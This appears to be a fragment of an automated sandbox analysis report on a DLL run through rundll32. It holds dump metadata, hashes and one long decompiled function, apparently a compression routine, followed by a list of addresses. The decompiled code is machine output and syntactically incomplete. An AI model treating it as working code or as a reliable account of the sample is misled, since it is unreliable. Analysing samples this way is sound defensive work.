                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                                                                                            • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 4133054770-1584408056
                                                                                                                                                                                                                                                                            • Opcode ID: 88c6ed96c91829df7c342a51efce9276512e3ecae6be753845a2ecd89279e371
                                                                                                                                                                                                                                                                            • Instruction ID: 3f5e57b1250461a42cf01aaecdc59c0111733b1b6bf08b31502ed366e43670da
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88c6ed96c91829df7c342a51efce9276512e3ecae6be753845a2ecd89279e371
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B619C75D00209EFDB01CF98C885BADBBF1FF08355F2185A9E915AB2A1D774AA80DF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                                                                                                                                            			E10014CE0(int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				void* _t137;
                                                                                                                                                                                                                                                                            				signed int _t141;
                                                                                                                                                                                                                                                                            				intOrPtr* _t142;
                                                                                                                                                                                                                                                                            				signed int _t145;
                                                                                                                                                                                                                                                                            				signed int _t146;
                                                                                                                                                                                                                                                                            				intOrPtr _t151;
                                                                                                                                                                                                                                                                            				intOrPtr _t161;
                                                                                                                                                                                                                                                                            				intOrPtr _t162;
                                                                                                                                                                                                                                                                            				intOrPtr _t167;
                                                                                                                                                                                                                                                                            				intOrPtr _t170;
                                                                                                                                                                                                                                                                            				signed int _t172;
                                                                                                                                                                                                                                                                            				intOrPtr _t173;
                                                                                                                                                                                                                                                                            				int _t184;
                                                                                                                                                                                                                                                                            				intOrPtr _t185;
                                                                                                                                                                                                                                                                            				intOrPtr _t188;
                                                                                                                                                                                                                                                                            				signed int _t189;
                                                                                                                                                                                                                                                                            				void* _t195;
                                                                                                                                                                                                                                                                            				int _t202;
                                                                                                                                                                                                                                                                            				int _t208;
                                                                                                                                                                                                                                                                            				intOrPtr _t217;
                                                                                                                                                                                                                                                                            				signed int _t218;
                                                                                                                                                                                                                                                                            				int _t219;
                                                                                                                                                                                                                                                                            				intOrPtr _t220;
                                                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                                                            				signed int _t222;
                                                                                                                                                                                                                                                                            				int _t224;
                                                                                                                                                                                                                                                                            				int _t225;
                                                                                                                                                                                                                                                                            				signed int _t227;
                                                                                                                                                                                                                                                                            				intOrPtr _t228;
                                                                                                                                                                                                                                                                            				int _t232;
                                                                                                                                                                                                                                                                            				int _t234;
                                                                                                                                                                                                                                                                            				signed int _t235;
                                                                                                                                                                                                                                                                            				int _t239;
                                                                                                                                                                                                                                                                            				void* _t240;
                                                                                                                                                                                                                                                                            				int _t245;
                                                                                                                                                                                                                                                                            				int _t252;
                                                                                                                                                                                                                                                                            				signed int _t253;
                                                                                                                                                                                                                                                                            				int _t254;
                                                                                                                                                                                                                                                                            				void* _t257;
                                                                                                                                                                                                                                                                            				void* _t258;
                                                                                                                                                                                                                                                                            				int _t259;
                                                                                                                                                                                                                                                                            				intOrPtr _t260;
                                                                                                                                                                                                                                                                            				int _t261;
                                                                                                                                                                                                                                                                            				signed int _t269;
                                                                                                                                                                                                                                                                            				signed int _t271;
                                                                                                                                                                                                                                                                            				intOrPtr* _t272;
                                                                                                                                                                                                                                                                            				void* _t273;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t253 = _a8;
                                                                                                                                                                                                                                                                            				_t272 = _a4;
                                                                                                                                                                                                                                                                            				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                                                                                                            				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                                                                            				_t228 =  *_t4;
                                                                                                                                                                                                                                                                            				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                                                                                                                            				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                                                                                                                            				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                                                                                                                            				_t269 = 0;
                                                                                                                                                                                                                                                                            				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                                                                                                                            				asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					_t8 = _t272 + 0x16bc; // 0x40f8458b
                                                                                                                                                                                                                                                                            					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                                                                                                                            					_v12 = 0xffff;
                                                                                                                                                                                                                                                                            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                                                                                                                            					if(_t217 < _t141) {
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t11 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                                                                                                                            					_t12 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                                                                                                                            					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                                                                                                                            					_v8 = _t245;
                                                                                                                                                                                                                                                                            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                                                                                                                            					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                                                                                                                            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                                                                                                                            					if(_t227 >= _v16) {
                                                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                                                            						if(_t253 != 4) {
                                                                                                                                                                                                                                                                            							L10:
                                                                                                                                                                                                                                                                            							_t269 = 0;
                                                                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t285 = _t227 - _t195;
                                                                                                                                                                                                                                                                            							if(_t227 != _t195) {
                                                                                                                                                                                                                                                                            								goto L10;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t269 = _t253 - 3;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						E10017D00(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                                                                                                                            						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                                                                                            						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                                                                                            						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                                                                                                                            						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                                                                                            						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                                                                                            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                                                                                                                            						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                                                                                            						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                                                                                            						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                                                                                                                            						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                                                                                            						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                                                                                            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                                                                                                                            						E10016A60(_t285,  *_t272);
                                                                                                                                                                                                                                                                            						_t202 = _v8;
                                                                                                                                                                                                                                                                            						_t273 = _t273 + 0x14;
                                                                                                                                                                                                                                                                            						if(_t202 != 0) {
                                                                                                                                                                                                                                                                            							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                                                                                                                            							_v8 = _t208;
                                                                                                                                                                                                                                                                            							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                                                                            							_t37 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                                                                                                                            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                                                                                                                            							_t273 = _t273 + 0xc;
                                                                                                                                                                                                                                                                            							_t252 = _v8;
                                                                                                                                                                                                                                                                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                                                                                                                            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                                                                                                                            							_t227 = _t227 - _t252;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_t227 != 0) {
                                                                                                                                                                                                                                                                            							E10016BA0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                                                                                                                            							_t273 = _t273 + 0xc;
                                                                                                                                                                                                                                                                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t253 = _a8;
                                                                                                                                                                                                                                                                            						if(_t269 == 0) {
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                                                                                                                            							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                                                                                                                            								goto L7;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t142 =  *_t272;
                                                                                                                                                                                                                                                                            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                                                                                                                            				_a4 = _t232;
                                                                                                                                                                                                                                                                            				if(_t232 == 0) {
                                                                                                                                                                                                                                                                            					_t83 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                                                                                                                            					_t254 =  *_t83;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                                                                            					_t224 =  *_t59;
                                                                                                                                                                                                                                                                            					if(_t232 < _t224) {
                                                                                                                                                                                                                                                                            						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                                                                                                            						_t66 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                                                                                                                            						_t260 =  *_t66;
                                                                                                                                                                                                                                                                            						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                                                                                                                            						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                                                                                                                            							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                                                                            							_t261 = _t260 - _t224;
                                                                                                                                                                                                                                                                            							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                                                                                                                            							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                                                                                                                            							_t70 = _t272 + 0x16b0; // 0x1488087d
                                                                                                                                                                                                                                                                            							_t188 =  *_t70;
                                                                                                                                                                                                                                                                            							_t273 = _t273 + 0xc;
                                                                                                                                                                                                                                                                            							_t232 = _a4;
                                                                                                                                                                                                                                                                            							__eflags = _t188 - 2;
                                                                                                                                                                                                                                                                            							if(_t188 < 2) {
                                                                                                                                                                                                                                                                            								_t189 = _t188 + 1;
                                                                                                                                                                                                                                                                            								__eflags = _t189;
                                                                                                                                                                                                                                                                            								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                                                                            						_t74 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                                                                                                                            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                                                                                                                            						_t225 = _a4;
                                                                                                                                                                                                                                                                            						_t273 = _t273 + 0xc;
                                                                                                                                                                                                                                                                            						_t76 = _t272 + 0x6c;
                                                                                                                                                                                                                                                                            						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                                                                                                                            						__eflags =  *_t76;
                                                                                                                                                                                                                                                                            						_t78 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                                                                                                                            						_t184 =  *_t78;
                                                                                                                                                                                                                                                                            						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                                                                            						_t239 =  *_t79;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                                                                                                                            						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                                                                            						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                                                                                                                            						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                                                                            						_t184 =  *_t62;
                                                                                                                                                                                                                                                                            						_t273 = _t273 + 0xc;
                                                                                                                                                                                                                                                                            						_t225 = _a4;
                                                                                                                                                                                                                                                                            						_t239 = _t184;
                                                                                                                                                                                                                                                                            						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t254 = _t184;
                                                                                                                                                                                                                                                                            					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                                                                                                                            					_t81 = _t272 + 0x16b4; // 0xff4d8a39
                                                                                                                                                                                                                                                                            					_t185 =  *_t81;
                                                                                                                                                                                                                                                                            					_t240 = _t239 - _t185;
                                                                                                                                                                                                                                                                            					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                                                                                                                            					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                                                                                                                            					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_t269 == 0) {
                                                                                                                                                                                                                                                                            					_t218 = _a8;
                                                                                                                                                                                                                                                                            					__eflags = _t218;
                                                                                                                                                                                                                                                                            					if(_t218 == 0) {
                                                                                                                                                                                                                                                                            						L34:
                                                                                                                                                                                                                                                                            						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                                                                                                            						_t219 =  *_t272;
                                                                                                                                                                                                                                                                            						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                                                                                                                            						_a4 =  *_t272;
                                                                                                                                                                                                                                                                            						_t234 = _t254;
                                                                                                                                                                                                                                                                            						_v16 = _t145;
                                                                                                                                                                                                                                                                            						_v8 = _t254;
                                                                                                                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                                                                                                                            							_v8 = _t254;
                                                                                                                                                                                                                                                                            							_t95 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                                                                                                                            							_a4 = _t219;
                                                                                                                                                                                                                                                                            							_t234 = _t254;
                                                                                                                                                                                                                                                                            							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                                                                            							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                                                                                                                            							if( *_t95 >=  *_t97) {
                                                                                                                                                                                                                                                                            								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                                                                            								_t167 =  *_t98;
                                                                                                                                                                                                                                                                            								_t259 = _t254 - _t167;
                                                                                                                                                                                                                                                                            								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                                                                            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                                                                                                                            								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                                                                                                                            								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                                                                                                                            								_t103 = _t272 + 0x16b0; // 0x1488087d
                                                                                                                                                                                                                                                                            								_t170 =  *_t103;
                                                                                                                                                                                                                                                                            								_t273 = _t273 + 0xc;
                                                                                                                                                                                                                                                                            								__eflags = _t170 - 2;
                                                                                                                                                                                                                                                                            								if(_t170 < 2) {
                                                                                                                                                                                                                                                                            									_t172 = _t170 + 1;
                                                                                                                                                                                                                                                                            									__eflags = _t172;
                                                                                                                                                                                                                                                                            									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                                                                            								_t145 = _v16 +  *_t106;
                                                                                                                                                                                                                                                                            								__eflags = _t145;
                                                                                                                                                                                                                                                                            								_a4 =  *_t272;
                                                                                                                                                                                                                                                                            								_t108 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                                                                                                                            								_t234 =  *_t108;
                                                                                                                                                                                                                                                                            								_v8 = _t234;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t255 = _a4;
                                                                                                                                                                                                                                                                            						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                                                                                                                            						__eflags = _t145 - _t220;
                                                                                                                                                                                                                                                                            						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                                                                                                                            						_t146 = _t221;
                                                                                                                                                                                                                                                                            						_a4 = _t221;
                                                                                                                                                                                                                                                                            						_t222 = _a8;
                                                                                                                                                                                                                                                                            						__eflags = _t146;
                                                                                                                                                                                                                                                                            						if(_t146 != 0) {
                                                                                                                                                                                                                                                                            							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                                                                            							E10016BA0(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                                                                                                                            							_t273 = _t273 + 0xc;
                                                                                                                                                                                                                                                                            							_t117 = _t272 + 0x6c;
                                                                                                                                                                                                                                                                            							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                                                                                                                            							__eflags =  *_t117;
                                                                                                                                                                                                                                                                            							_t119 = _t272 + 0x6c; // 0x20fd8a1
                                                                                                                                                                                                                                                                            							_t234 =  *_t119;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                                                                                                                            						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                                                                                                                            							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t122 = _t272 + 0x16bc; // 0x40f8458b
                                                                                                                                                                                                                                                                            						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                                                                                                            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                                                                                                                            						__eflags = _t257 - 0xffff;
                                                                                                                                                                                                                                                                            						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                                                                                                                            						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                                                                                            						_t151 =  *_t124;
                                                                                                                                                                                                                                                                            						_t125 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                                                                                                                            						_t235 = _t234 -  *_t125;
                                                                                                                                                                                                                                                                            						__eflags = _t258 - _t151;
                                                                                                                                                                                                                                                                            						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                                                                                                                            						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                                                                                                                            						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                                                                                                                            							L49:
                                                                                                                                                                                                                                                                            							__eflags = _t235 - _t258;
                                                                                                                                                                                                                                                                            							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                                                                                                                            							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                                                                                                                            							__eflags = _t222 - 4;
                                                                                                                                                                                                                                                                            							if(_t222 != 4) {
                                                                                                                                                                                                                                                                            								L53:
                                                                                                                                                                                                                                                                            								_t269 = 0;
                                                                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t161 =  *_t272;
                                                                                                                                                                                                                                                                            								__eflags =  *(_t161 + 4);
                                                                                                                                                                                                                                                                            								_t154 = _a4;
                                                                                                                                                                                                                                                                            								if( *(_t161 + 4) != 0) {
                                                                                                                                                                                                                                                                            									goto L53;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									__eflags = _t154 - _t235;
                                                                                                                                                                                                                                                                            									if(_t154 != _t235) {
                                                                                                                                                                                                                                                                            										goto L53;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_t269 = _t222 - 3;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                                                                                            							_t132 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                                                                                                                            							E10017D00(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                                                                                                                            							_t134 = _t272 + 0x5c;
                                                                                                                                                                                                                                                                            							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                                                                                                                            							__eflags =  *_t134;
                                                                                                                                                                                                                                                                            							E10016A60( *_t134,  *_t272);
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							__eflags = _t235;
                                                                                                                                                                                                                                                                            							if(_t235 != 0) {
                                                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                                                            								__eflags = _t222;
                                                                                                                                                                                                                                                                            								if(_t222 != 0) {
                                                                                                                                                                                                                                                                            									_t162 =  *_t272;
                                                                                                                                                                                                                                                                            									__eflags =  *(_t162 + 4);
                                                                                                                                                                                                                                                                            									if( *(_t162 + 4) == 0) {
                                                                                                                                                                                                                                                                            										__eflags = _t235 - _t258;
                                                                                                                                                                                                                                                                            										if(_t235 <= _t258) {
                                                                                                                                                                                                                                                                            											goto L49;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								__eflags = _t222 - 4;
                                                                                                                                                                                                                                                                            								if(_t222 == 4) {
                                                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						asm("sbb edi, edi");
                                                                                                                                                                                                                                                                            						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                                                                                                                            						__eflags = _t271;
                                                                                                                                                                                                                                                                            						return _t271;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__eflags = _t218 - 4;
                                                                                                                                                                                                                                                                            						if(_t218 == 4) {
                                                                                                                                                                                                                                                                            							goto L34;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t173 =  *_t272;
                                                                                                                                                                                                                                                                            							__eflags =  *(_t173 + 4);
                                                                                                                                                                                                                                                                            							if( *(_t173 + 4) != 0) {
                                                                                                                                                                                                                                                                            								goto L34;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t88 = _t272 + 0x5c; // 0x38e85000
                                                                                                                                                                                                                                                                            								__eflags = _t254 -  *_t88;
                                                                                                                                                                                                                                                                            								if(_t254 !=  *_t88) {
                                                                                                                                                                                                                                                                            									goto L34;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									return 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					return 3;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}






















































                                                                                                                                                                                                                                                                            0x10014ce6
                                                                                                                                                                                                                                                                            0x10014ceb
                                                                                                                                                                                                                                                                            0x10014cef
                                                                                                                                                                                                                                                                            0x10014cf2
                                                                                                                                                                                                                                                                            0x10014cf2
                                                                                                                                                                                                                                                                            0x10014cf5
                                                                                                                                                                                                                                                                            0x10014cfa
                                                                                                                                                                                                                                                                            0x10014cff
                                                                                                                                                                                                                                                                            0x10014d02
                                                                                                                                                                                                                                                                            0x10014d07
                                                                                                                                                                                                                                                                            0x10014d0a
                                                                                                                                                                                                                                                                            0x10014d10
                                                                                                                                                                                                                                                                            0x10014d10
                                                                                                                                                                                                                                                                            0x10014d1b
                                                                                                                                                                                                                                                                            0x10014d1e
                                                                                                                                                                                                                                                                            0x10014d25
                                                                                                                                                                                                                                                                            0x10014d2a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014d30
                                                                                                                                                                                                                                                                            0x10014d35
                                                                                                                                                                                                                                                                            0x10014d35
                                                                                                                                                                                                                                                                            0x10014d3a
                                                                                                                                                                                                                                                                            0x10014d40
                                                                                                                                                                                                                                                                            0x10014d4a
                                                                                                                                                                                                                                                                            0x10014d4f
                                                                                                                                                                                                                                                                            0x10014d55
                                                                                                                                                                                                                                                                            0x10014d74
                                                                                                                                                                                                                                                                            0x10014d77
                                                                                                                                                                                                                                                                            0x10014d82
                                                                                                                                                                                                                                                                            0x10014d82
                                                                                                                                                                                                                                                                            0x10014d82
                                                                                                                                                                                                                                                                            0x10014d79
                                                                                                                                                                                                                                                                            0x10014d79
                                                                                                                                                                                                                                                                            0x10014d7b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014d7d
                                                                                                                                                                                                                                                                            0x10014d7d
                                                                                                                                                                                                                                                                            0x10014d7d
                                                                                                                                                                                                                                                                            0x10014d7b
                                                                                                                                                                                                                                                                            0x10014d8a
                                                                                                                                                                                                                                                                            0x10014d8f
                                                                                                                                                                                                                                                                            0x10014d94
                                                                                                                                                                                                                                                                            0x10014d9a
                                                                                                                                                                                                                                                                            0x10014d9e
                                                                                                                                                                                                                                                                            0x10014da1
                                                                                                                                                                                                                                                                            0x10014da4
                                                                                                                                                                                                                                                                            0x10014daa
                                                                                                                                                                                                                                                                            0x10014daf
                                                                                                                                                                                                                                                                            0x10014db2
                                                                                                                                                                                                                                                                            0x10014db8
                                                                                                                                                                                                                                                                            0x10014dbd
                                                                                                                                                                                                                                                                            0x10014dc3
                                                                                                                                                                                                                                                                            0x10014dc9
                                                                                                                                                                                                                                                                            0x10014dce
                                                                                                                                                                                                                                                                            0x10014dd1
                                                                                                                                                                                                                                                                            0x10014dd6
                                                                                                                                                                                                                                                                            0x10014dda
                                                                                                                                                                                                                                                                            0x10014dde
                                                                                                                                                                                                                                                                            0x10014de1
                                                                                                                                                                                                                                                                            0x10014de4
                                                                                                                                                                                                                                                                            0x10014ded
                                                                                                                                                                                                                                                                            0x10014df4
                                                                                                                                                                                                                                                                            0x10014df7
                                                                                                                                                                                                                                                                            0x10014dfa
                                                                                                                                                                                                                                                                            0x10014dff
                                                                                                                                                                                                                                                                            0x10014e04
                                                                                                                                                                                                                                                                            0x10014e07
                                                                                                                                                                                                                                                                            0x10014e0a
                                                                                                                                                                                                                                                                            0x10014e0a
                                                                                                                                                                                                                                                                            0x10014e0e
                                                                                                                                                                                                                                                                            0x10014e17
                                                                                                                                                                                                                                                                            0x10014e1e
                                                                                                                                                                                                                                                                            0x10014e21
                                                                                                                                                                                                                                                                            0x10014e26
                                                                                                                                                                                                                                                                            0x10014e2b
                                                                                                                                                                                                                                                                            0x10014e2b
                                                                                                                                                                                                                                                                            0x10014e2e
                                                                                                                                                                                                                                                                            0x10014e33
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
